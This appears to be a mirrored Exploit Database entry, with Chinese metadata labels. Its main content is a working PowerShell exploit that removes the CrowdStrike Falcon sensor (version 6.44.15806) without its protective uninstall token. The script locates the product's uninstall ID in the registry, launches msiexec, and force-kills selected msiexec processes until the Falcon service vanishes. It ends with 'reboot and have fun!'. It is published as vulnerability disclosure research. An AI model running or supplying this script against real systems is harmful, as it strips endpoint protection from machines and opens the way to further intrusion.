CrowdStrike Falcon AGENT 6.44.15806 – Uninstall without Installation Token

• Exploit Database
• 15 阅读

• 作者： Fortunato Lodari
  日期： 2023-03-30
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/51146/

• # Exploit Title: CrowdStrike Falcon AGENT6.44.15806- Uninstall without Installation Token 
  # Date: 30/11/2022 
  # Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team) 
  # Vendor Homepage: https://www.crowdstrike.com/ 
  # Author Homepage: https://www.deda.cloud/ 
  # Tested On: All Windows versions 
  # Version: 6.44.15806 
  # CVE: Based on CVE-2022-2841; Modified by Deda Cloud Purple Team members, to exploit hotfixed release. Pubblication of of CVE-2022-44721 in progress. 
  
  
  $InstalledSoftware = Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall"
  
  foreach($obj in $InstalledSoftware){
  if ("CrowdStrike Sensor Platform" -eq $obj.GetValue('DisplayName'))
  {
  $uninstall_uuid = $obj.Name.Split("\")[6]
  }
  }
  
  $g_msiexec_instances = New-Object System.Collections.ArrayList
  
  Write-Host "[+] Identified installed Falcon: $uninstall_uuid"
  Write-Host "[+] Running uninstaller for Crowdstrike Falcon . . ."
  Start-Process "msiexec" -ArgumentList "/X$uninstall_uuid"
  
  while($true)
  {
  	if (get-process -Name "CSFalconService") {
  		Get-Process | Where-Object { $_.Name -eq "msiexec" } | ForEach-Object {
  			
  			if (-Not $g_msiexec_instances.contains($_.id)){
  				$g_msiexec_instances.Add($_.id)
  				if (4 -eq $g_msiexec_instances.count -or 5 -eq $g_msiexec_instances.count){
  					Start-Sleep -Milliseconds 100
  					Write-Host "[+] Killing PID " + $g_msiexec_instances[-1]
  					stop-process -Force -Id $g_msiexec_instances[-1]				
  				}
  
  			}
  		
  		}
  	} else { 
  		Write-Host "[+] CSFalconService process vanished...reboot and have fun!"
  		break
  	}
  }